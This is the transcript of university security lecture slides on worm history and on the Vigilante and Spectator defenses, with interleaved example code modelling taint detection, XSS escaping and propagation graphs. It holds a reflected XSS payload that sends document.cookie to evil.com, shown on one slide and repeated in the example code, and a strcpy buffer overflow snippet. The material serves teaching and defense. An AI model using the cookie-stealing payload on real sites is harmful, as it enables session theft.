Worms and Self-Propagating Malware (css.csail.mit.edu/6.858/2011/slides/lec11.pdf)
TRANSCRIPT
Page 1
WORMS AND SELF-PROPAGATING MALWARE
Ben Livshits, Microsoft Research
Page 2
Overview of Today’s Lecture
Malware: taxonomy
History, evolution, and progression of worms: an overview
Worm defenses: Vigilante worm detection/prevention paper
JavaScript worms
Spectator: JavaScript worm detection and prevention
2
Page 3
Malicious Code: Taxonomy
Viruses – replicating malicious code
Worms – self-replicating malicious code
▪ Native code worms
▪ JavaScript worms
Logic bombs or backdoors or Easter eggs: programmed malfunction
Trojan Horses – malicious program that masquerades as legitimate
▪ Backdoors
▪ Password stealers
Downloaders – loads other malicious code on a machine
Dialers – generate money for attackers by having users unknowingly dial premium rate numbers
Page 4
Malicious Code: Taxonomy
Code generator kits (e.g. Virus Creation Lab)
Spammer programs
Flooders
DDOS tools
BotNets
Key-loggers
Adware
Spyware
Phishing attacks
Page 5
Worms: A Working Definition
A worm is a program that can run by itself and can propagate a fully working version of itself to other machines
It is derived from the word tapeworm, a parasitic organism that lives inside a host and saps its resources to maintain itself
5
Page 6
The Morris Worm (1988)
6
Photos: Robert T. Morris; Boston Museum of Science
Page 7
Morris Worm Account by Spafford (1989)
7
Page 8
IKEE.B (DUH) IPHONE BOTNET – 2009
Very soon after this incident, around the week of 8 November, a second iPhone malware outbreak began in Australia, using the very same SSH vulnerability. This time the malware did not just infect jailbroken iPhones, but would then convert the iPhone into a self-propagating worm, to infect other iPhones. This worm, referred to as iKee.A, was developed by an Australian hacker named Ashley Towns.
The worm would install a wallpaper of the British 1980s pop star Rick Astley onto the victim's iPhone, and it succeeded in infecting an estimated 21,000 victims within about a week.
However, unlike the Dutch teenager who was sanctioned and who apologized, Mr. Towns received some notoriety, and was subsequently offered a job by a leading Australian software company, Mogeneration.
8
Page 9
Worms: A Brief History
9
Morris Worm (1988)
Melissa (1999)
ILOVEYOU (2000)
Code Red (2001)
Nimda (2001)
Blaster (2003)
SQL Slammer (2003)
Samy/MySpace (2005)
xanga.com (2005)
SpaceFlash/MySpace
Yamanner/Yahoo! Mail
QSpace/MySpace
adultspace.com
gaiaonline.com
u-dominion.com (2007)
Timeline figure: Morris Worm, Melissa, Code Red/Nimda, Blaster/Slammer, Samy, Yamanner/Yahoo! Mail; axis labels 1998 1999 2001 2003 2005 2006 …
Page 10
Morris Worm (1988)
Damage: 6,000 computers in just a few hours
What: just copied itself; didn’t touch data
Exploited:
buffer overflow in fingerd (UNIX)
sendmail debug mode (exec arbitrary cmds)
dictionary of 432 frequently used passwords
Page 11
Melissa (1999)
What: just copied itself; did not touch data
When date = time (minute of the hour equals day of the month): “Twenty-two points, plus triple word score, plus fifty points for using all my letters. Game’s over. I’m outta here.”
Exploited:
MS Word Macros (VB)
MS Outlook Address Book (fanout = 50): “Important message from <user name> …”
Page 12
Code Red (2001)
Runs on WinNT 4.0 or Windows 2000
Scans port 80 on up to 100 random IP addresses
Resides only in RAM; no files
Exploits buffer overflow in Microsoft IIS 4.0/5.0 (virus appeared one month after advisory went out)
Two flavors:
Code Red I: high traffic, web defacements, DDOS on whitehouse.gov, crash systems
Code Red II: high traffic, backdoor install, crash systems
Three phases, by day of the month: propagation (1-19), flood (20-27), termination (28-31)
Other victims: Cisco 600 Routers, HP JetDirect Printers
Page 13
Nimda (2001)
Multiple methods of spreading (email, client-to-server, server-to-client, network sharing)
Server-to-client: IE auto-executes readme.eml (that is attached to all HTML files the server sends back to the client)
Client-to-server: “burrows”: scanning is local 75% of time
Email: readme.exe is auto executed upon viewing HTML email on IE 5.1 or earlier
Page 14
More on Slammer
When: Jan 25 2003
How: exploits a buffer overflow in MS SQL Server / MS SQL Server Desktop Engine; known vulnerability, publicized in July 2002
Scale: at least 74,000 hosts
Feature: fast propagation speed, >55 million scans per second, two orders of magnitude faster than the Code Red worm; no harmful payload
Countermeasure: patch; firewall (port blocking)
14
Page 15
Case Study: Slammer
Buffer overflow vulnerability in Microsoft SQL Server (MS02-039).
Vulnerability of the following kind:
void ProcessUDPPacket() {
    char SmallBuf[100];          /* fixed-size stack buffer */
    char LargeBuf[1024];         /* receives the whole datagram; size assumed for illustration */
    UDPRecv(LargeBuf);           /* attacker controls length and content of the datagram */
    strcpy(SmallBuf, LargeBuf);  /* no bounds check: overflows SmallBuf once the datagram exceeds 99 bytes */
    …
}
Page 16
Slammer Propagation Map
16
Page 17
Manuel Costa, Jon Crowcroft, Miguel Castro, Ant Rowstron, Lidong Zhou, Lintao Zhang, Paul Barham
Vigilante: End-to-End Containment of Internet Worms*
*Based on slides by Marcus Peinado, Microsoft Research
http://research.microsoft.com/en-us/projects/vigilante/
Page 18
Defense Landscape
What happened as a result of CodeRed, Slammer, and Blaster?
Lots of work on techniques for avoiding attacks
Many papers are written between 2003 and 2006
Some of them are practical
A few are deployed
Some are in widespread use
Automatic techniques: stack canaries, ASLR, NX, static analysis tools, pen-testing, fuzzing, software development standards
Developer awareness: check for buffer overflows etc.
User awareness: install patches ASAP; use AV, use firewalls
Response infrastructure: fast patch release, AV
18
Page 19
The Worm Threat
worms are a serious threat
worm propagation disrupts Internet traffic
attacker gains control of infected machines
worms spread too fast for human response
Slammer scanned most of the Internet in 10 minutes
infected 90% of vulnerable hosts
Conclusion: worm containment must be automatic
Page 20
Automatic Worm Containment
previous solutions are network centric
analyse network traffic
generate signature and drop matching traffic or
block hosts with abnormal network behaviour
no vulnerability information at network level
false negatives: worm traffic appears normal
false positives: good traffic misclassified
false positives are a barrier to automation
Page 21
Vigilante’s End-to-end Architecture
host-based detection
instrument software to analyse infection attempts
cooperative detection without trust
detectors generate self-certifying alerts (SCAs)
detectors broadcast SCAs
hosts generate filters to block infection
can contain fast spreading worms with small number of detectors and without false positives
Page 22
22
Worm Containment
Figure: detector hosts and ordinary hosts connected over the Internet, exchanging SCAs
Vigilante Detectors
– Analyze execution of application
– Produce alerts (SCAs) based on attack packets and vulnerable applications
– Broadcast SCAs over the Pastry P2P network
Receiving hosts
• Receive SCAs
• Verify SCAs
• Generate packet filters from SCAs
• Deploy packet filters
Page 23
Self-certifying Alerts
identify an application vulnerability
describe how to exploit a vulnerability
contain a log of events
contain verification information
enable hosts to verify if they are vulnerable
replay infection with modified events
verification has no false positives
enable cooperative worm containment without trust
Page 24
Detection
dynamic dataflow analysis
track the flow of data from input messages
mark memory as dirty when data is received
track all data movement
trap the worm before it executes any instructions
track control flow changes
trap execution of input data
trap loading of data into the program counter
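A toy model of the detection step described on the last three slides, added here as an example (my own code, not Vigilante's): a 16-cell machine whose memory cells carry taint sets, a handler shaped like the Slammer snippet (receive, unbounded copy, return), a detector that turns a trap into a self-certifying alert carrying the message and the event log, a verifier that replays the alert against the local copy of the service, and a packet filter derived from the verified alert. The cell layout, the 7-byte staging area and the filter rule are assumptions of this model.

```python
# Toy Vigilante-style host detector (assumed model, not Vigilante's code): every
# memory cell carries a taint set, the input offsets it derives from; loading
# tainted data into the program counter traps before the payload runs.

class TaintTrap(Exception):
    """Raised when data derived from a network message is about to become the PC."""

    def __init__(self, offsets, log):
        super().__init__("control flow loaded from input data")
        self.offsets = offsets   # input byte offsets that reached the program counter
        self.log = log           # event log: the replayable evidence carried by an SCA


class Machine:
    SMALL_BUF = 0   # cells 0..3 play the role of "char SmallBuf[4]"
    RET_SLOT = 4    # the saved return address sits right after the buffer
    LARGE_BUF = 8   # cells 8..15: staging area the datagram is received into

    def __init__(self):
        self.mem = [0] * 16
        self.mem[self.RET_SLOT] = 42                  # legitimate return target
        self.taint = [frozenset() for _ in self.mem]  # clean memory at start
        self.log = []

    def recv(self, data):
        """Network input: copy into LARGE_BUF and mark each cell dirty with its offset."""
        self.log.append(("recv", bytes(data)))
        payload = bytes(data)[:7]                     # staging area is always 0-terminated
        for i, b in enumerate(payload):
            self.mem[self.LARGE_BUF + i] = b
            self.taint[self.LARGE_BUF + i] = frozenset({i})
        self.mem[self.LARGE_BUF + len(payload)] = 0
        self.taint[self.LARGE_BUF + len(payload)] = frozenset()

    def strcpy(self, dst, src):
        """Unbounded copy up to and including the first zero byte; taint moves with data."""
        self.log.append(("strcpy", dst, src))
        i = 0
        while True:
            self.mem[dst + i] = self.mem[src + i]
            self.taint[dst + i] = self.taint[src + i]
            if self.mem[src + i] == 0:
                return
            i += 1

    def ret(self):
        """Load the PC from the saved slot; trap if that value derives from input."""
        self.log.append(("ret",))
        if self.taint[self.RET_SLOT]:
            raise TaintTrap(sorted(self.taint[self.RET_SLOT]), list(self.log))
        return self.mem[self.RET_SLOT]


def run_service(data):
    """The vulnerable handler from the Slammer slide: receive, unbounded copy, return."""
    m = Machine()
    m.recv(data)
    m.strcpy(Machine.SMALL_BUF, Machine.LARGE_BUF)
    return m.ret()


def detect(data):
    """Detector host: run the instrumented service; return an SCA on trap, else None."""
    try:
        run_service(data)
    except TaintTrap as trap:
        return {"vulnerable_function": "run_service", "message": bytes(data),
                "pc_offsets": trap.offsets, "log": trap.log}
    return None


def verify_sca(sca):
    """A receiving host replays the message against its own copy of the service,
    so a forged alert whose message does not trap is rejected without trusting the sender."""
    return detect(sca["message"]) is not None


def make_filter(sca):
    """Vulnerability-specific filter derived from a verified SCA: the copy reaches the
    return slot only if no terminator precedes the offset that hit the PC (assumed rule)."""
    off = min(sca["pc_offsets"])
    return lambda msg: len(msg) > off and 0 not in bytes(msg)[:off]
```

The filter is keyed on the condition that makes the vulnerable copy reach the return slot, not on the bytes of any one worm, which is why a re-encoded variant of the same message is still dropped while a short message with a terminator in the first four bytes passes.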
Page 25
Time to Generate Filters
Chart, filter generation time in ms (log scale 1 to 10000): Slammer 24, Blaster 273, CodeRed 3402
Page 26
Vigilante Summary
Vigilante can contain worms automatically
requires no prior knowledge of vulnerabilities
no false positives
low false negatives
works with today’s binaries
Tested on CodeRed, Nimda, and Slammer
Page 27
Question of the Day
What is the enabling software vulnerability behind regular worms? JavaScript worms?
27
Page 28
Spectator: Detection and Containment of JavaScript Worms
Ben Livshits and Weidong Cui, Microsoft Research, Redmond, WA
http://research.microsoft.com/en-us/projects/spectator/usenixtech08.pdf
Page 29
Web application vulnerabilities are everywhere
Cross-site scripting (XSS)
Dominates the charts
“Buffer overruns of this decade”
Key enabler of JavaScript worms
29
Page 30
String username = req.getParameter("username");
ServletOutputStream out = resp.getOutputStream();
out.println("<p>Hello, " + username + ".</p>");  // username is echoed into the page unescaped: reflected XSS
http://victim.com?username=<script>location = "http://evil.com/stealcookie.cgi?cookie=" + escape(document.cookie)</script>
30
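The greeting page from this slide, rendered both the vulnerable way and with output encoding, as an added example in Python's standard library (my own code, not the slide's servlet). The payload string and the request path helper are constructed to mirror the slide's URL; the server-side names are assumptions.

```python
# Added example: reflected XSS from the greeting page, unsafe and hardened rendering.
import html
from urllib.parse import parse_qs, urlencode, urlsplit

# Constructed payload mirroring the slide's URL: it tries to ship the cookie to evil.com.
PAYLOAD = ('<script>location = "http://evil.com/stealcookie.cgi?cookie=" '
           '+ escape(document.cookie)</script>')
ATTACK_URL = "http://victim.com/?" + urlencode({"username": PAYLOAD})


def username_from_url(url):
    """Server side of req.getParameter("username"): decode the query string."""
    query = parse_qs(urlsplit(url).query)
    return query.get("username", [""])[0]


def render_greeting_unsafe(username):
    """Echoes the parameter straight into HTML, like the slide's servlet."""
    return "<p>Hello, " + username + ".</p>"


def render_greeting_safe(username):
    """Same page with HTML entity encoding for element-content context:
    '<', '>', '&' and quotes become entities, so the browser shows text and runs nothing."""
    return "<p>Hello, " + html.escape(username, quote=True) + ".</p>"


def contains_script_element(page):
    """Crude check a test or response scanner might use: is there a live <script> tag?"""
    return "<script" in page.lower()


def handle_request(url, safe):
    """Whole request path: parse, render, and report whether a script element survived."""
    name = username_from_url(url)
    page = render_greeting_safe(name) if safe else render_greeting_unsafe(name)
    return page, contains_script_element(page)
```

Entity encoding is the fix for this slide's case because the value lands in element content; a value placed inside an attribute, a URL or a script block needs the encoding for that context, which is one reason XSS holes keep reappearing even on sites that escape most output.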
Page 31
Initial infection:
Samy’s MySpace page
Injected JavaScript payload
exploits a XSS hole
Propagation step:
User views an infected page
Payload executes
▪ Adds Samy as friend
▪ Add payload to user’s page
31
Page 32
Samy took down MySpace (October 2005)
Site couldn’t cope: down for two days
Came down after 13 hours
Cleanup costs
Yamanner (Yahoo mail) worm (June 2006)
Sent malicious HTML mail to users in the current user’s address book
Affected 200,000 users, emails used for spamming
32
Page 33
Worm name Type of site Release date
Samy/MySpace Social networking Oct-05
xanga.com Social networking Dec-05
SpaceFlash/MySpace Social networking Jul-06
Yamanner/Yahoo! Mail Email service Jun-06
QSpace/MySpace Social networking Nov-06
adultspace.com Social networking Dec-06
gaiaonline.com Online gaming Jan-07
u-dominion.com Online gaming Jan-07
33
Page 34
Worms of the previous decade enabled by buffer overruns
JavaScript worms are enabled by cross-site scripting (XSS)
Fixing XSS holes is best, but some vulnerabilities remain
The month of MySpace bugs
Database of XSS vulnerabilities: xssed.com
34
Page 35
Existing solutions rely on signatures (SonicWall)
Obfuscated and polymorphic JavaScript worms
Extremely easy to write
Most real-life worms are encoded or obfuscated
▪ escape(code)
▪ unescape(escaped_code)
35
Page 36
36
Figure: the server returns to the client a page of the form <HTML> <SCRIPT> anything goes here </SCRIPT> </HTML>
Page 37
Spectator: first practical JavaScript worm solution
Scalable, small constant-time end-to-end latency overhead
Deployment models for large sites supporting load balancing
Evaluation of Spectator:
Large-scale simulation setup for evaluating scalability and precision
Applied Spectator to a real site during worm propagation
37
Page 38
38
Page 39
Propagation chain figure (u1 → u2 → u3, carrying the payload):
u1 uploads to his page
u2 downloads page of u1
u2 uploads to his page
u3 downloads page of u2
u3 uploads to his page
…
1. Preserve causality of uploads, store as a graph
2. Detect long propagation chains
3. Report them as potential worm outbreaks
Page 40
Architecture figure: client-side tracking on users U1 and U2; requests (with a header) pass through the Spectator proxy to the server-side application; pages come back carrying tags, and causality is recorded as tag1 -> tag2
40
Page 41
Tagging of uploaded input: <div> <b onclick="javascript:alert('...')">...</b> </div> becomes <div spectator_tag=56> … </div>
Client-side request tracking: injected JavaScript and response headers
Propagates causality information through cookies on the client side
41
41
Page 42
Propagation graph G:
Records causality between tags (content uploads)
Records IP address (approximation of user) with each
Distance between n1 and n2: number of unique IP addresses on the path between them
Diameter: longest distance between any two nodes
Worm definition: Diameter(G) > threshold d
Example nodes (tag, IP): <t0, ip0> <t1, ip1> <t2, ip0> <t3, ip0> <t4, ip2> <t5, ip0> <t6, ip0> <t7, ip0> <t8, ip0> <t9, ip0>
42
Page 43
                         Precise algorithm   Approximate algorithm
Upload insertion time    O(2^n)              O(1) on average
Upload insertion space   O(n)                O(n)
Worm containment time    O(n)                O(n)
43
Determining diameter precisely is exponential
Scalability is crucial: thousands of users, millions of uploads
Use greedy approximation of the diameter instead
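The propagation graph, the IP-count distance and both diameter algorithms from the last four slides, as an added example (my own code, not the Spectator implementation). The graph uses the ten (tag, IP) nodes printed on the slide; the edges between them, the greedy summary kept per node, and the "long blog entry" scenario are assumptions of this example, not taken from the paper.

```python
# Added example of Spectator's propagation graph (own code): nodes are tags
# (uploads) labelled with the uploader's IP; an edge records causality, i.e. the
# uploader had just viewed the parent tag's page.

class PropagationGraph:
    def __init__(self):
        self.ip = {}        # tag -> IP address that performed the upload
        self.parents = {}   # tag -> tags whose pages were viewed before this upload
        self.chain = {}     # tag -> IP set of one greedily chosen long chain ending here

    def add_upload(self, tag, ip, caused_by=()):
        """Insert an upload. The greedy summary costs O(fan-in), O(1) on average."""
        self.ip[tag] = ip
        self.parents[tag] = list(caused_by)
        best = frozenset()
        for parent in caused_by:                    # keep the predecessor with most IPs
            if len(self.chain[parent]) > len(best):
                best = self.chain[parent]
        self.chain[tag] = best | {ip}
        return len(self.chain[tag])

    def precise_diameter(self):
        """Exact diameter: walk every path back to a root, counting distinct IPs.
        The number of paths can grow exponentially with the graph size."""
        best = 0

        def walk(tag, ips):
            nonlocal best
            ips = ips | {self.ip[tag]}
            best = max(best, len(ips))
            for parent in self.parents[tag]:
                walk(parent, ips)

        for tag in self.ip:
            walk(tag, frozenset())
        return best

    def approx_diameter(self):
        """Greedy diameter: the largest per-node chain set. Each set is the IP count
        of a real path, so the estimate never exceeds the precise value."""
        return max((len(s) for s in self.chain.values()), default=0)


def is_worm_outbreak(graph, d, precise=False):
    """Spectator's rule: report an outbreak when Diameter(G) > threshold d."""
    diameter = graph.precise_diameter() if precise else graph.approx_diameter()
    return diameter > d


def build_slide_graph():
    """Constructed graph using the slide's ten (tag, IP) nodes; the edges are assumed."""
    g = PropagationGraph()
    uploads = [("t0", "ip0", ()), ("t1", "ip1", ("t0",)), ("t2", "ip0", ("t1",)),
               ("t3", "ip0", ("t2",)), ("t4", "ip2", ("t1",)), ("t5", "ip0", ("t4",)),
               ("t6", "ip0", ("t5",)), ("t7", "ip0", ("t3",)), ("t8", "ip0", ("t7",)),
               ("t9", "ip0", ("t8",))]
    for tag, ip, parents in uploads:
        g.add_upload(tag, ip, parents)
    return g


def build_long_blog(entries=50):
    """OurSpace scenario 2: one user chaining many uploads from a single IP."""
    g = PropagationGraph()
    previous = ()
    for i in range(entries):
        g.add_upload(f"b{i}", "ip7", previous)
        previous = (f"b{i}",)
    return g
```

Counting distinct IPs rather than edges is what keeps the long blog entry below the threshold: fifty chained uploads from one address have diameter 1, while the worm-shaped graph reaches 3 as soon as a third address joins the chain.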
Page 44
44
Page 45
Large-scale simulation with OurSpace:
Mimics a social networking site like MySpace
Experimented with various patterns of site access
Looked at the scalability
Real-life case study (Siteframe):
Uses Siteframe, a third-party social networking app
Developed a JavaScript worm for it similar to real-life ones
45
Page 46
Testbed: OurSpace
Every user has their own page
At any point, a user can read or write to a page:
Write(U1, "hello"); Write(U1, Read(U2)); Write(U3, Read(U1));
Various access scenarios:
Scenario 1: Worm outbreak (random topology)
Scenario 2: A single long blog entry
Scenario 3: A power law model of worm propagation
46
Page 47
Tag addition overhead pretty much constant
47
Page 48
Approximate worm detection works well
48
Page 49
Real-life worm experimentation is difficult
Used Siteframe, open-source blogging system
Found an exploitable XSS
Developed a worm for it
Scripted user behavior
Spectator flags the worm
49
Page 50
First effective defense against JavaScript worms
Fast and slow, mono- and polymorphic worms
Scales well with low overhead
Essence of the approach
Perform distributed data tainting
Look for long propagation chains
Demonstrated scalability and effectiveness
Spectator: Detection and Containment of JavaScript Worms, Usenix Annual Technical Conference, June 2008
50
Page 51
Summary
Malware: taxonomy
History, evolution, and progression of worms: an overview
Worm defenses: Vigilante worm detection/prevention paper
JavaScript worms
Spectator: JavaScript worm detection and prevention
51